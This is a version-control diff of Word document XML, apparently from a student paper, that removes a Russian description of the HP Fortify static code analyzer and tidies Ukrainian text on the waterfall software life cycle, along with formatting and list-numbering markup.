-        <w:t>Support for Ajax and dojo frameworks.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26758,37 +27099,23 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>HP Fortify Static Code Analyzer</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26801,466 +27128,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">HP Fortify Static Code Analyzer </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>поддерживает</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>большое</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>число</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>языков</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>программирования</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>платформ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>включая</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>веб</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>приложения</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>написанные</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> PHP, Python, Java/JSP, ASP.Net </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JavaScript, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>встраиваемый</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>код</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>языках</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ABAP (SAP), Action Script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> VBScript.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -30493,6 +30360,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="8">
+    <w:nsid w:val="57C26945"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="297E440E"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -30605,7 +30585,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9">
+  <w:abstractNum w:abstractNumId="10">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -30718,7 +30698,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10">
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="6E2B310E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -30831,7 +30811,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11">
+  <w:abstractNum w:abstractNumId="12">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -30948,16 +30928,16 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="6">
     <w:abstractNumId w:val="7"/>
@@ -30975,10 +30955,13 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="12">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="13">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>
@@ -32035,7 +32018,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{55F10CF0-A310-4ABB-9178-555DF61AC711}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA435F37-0A70-466C-9F87-7FD5CF1D54D1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
with owasp description + full life cycle v6
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -488,25 +488,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">ілки, в результаті чого вийшов графік </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>стандартного</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -631,20 +613,10 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
@@ -667,17 +639,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> опис фаз каскадної моделі</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -810,16 +771,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
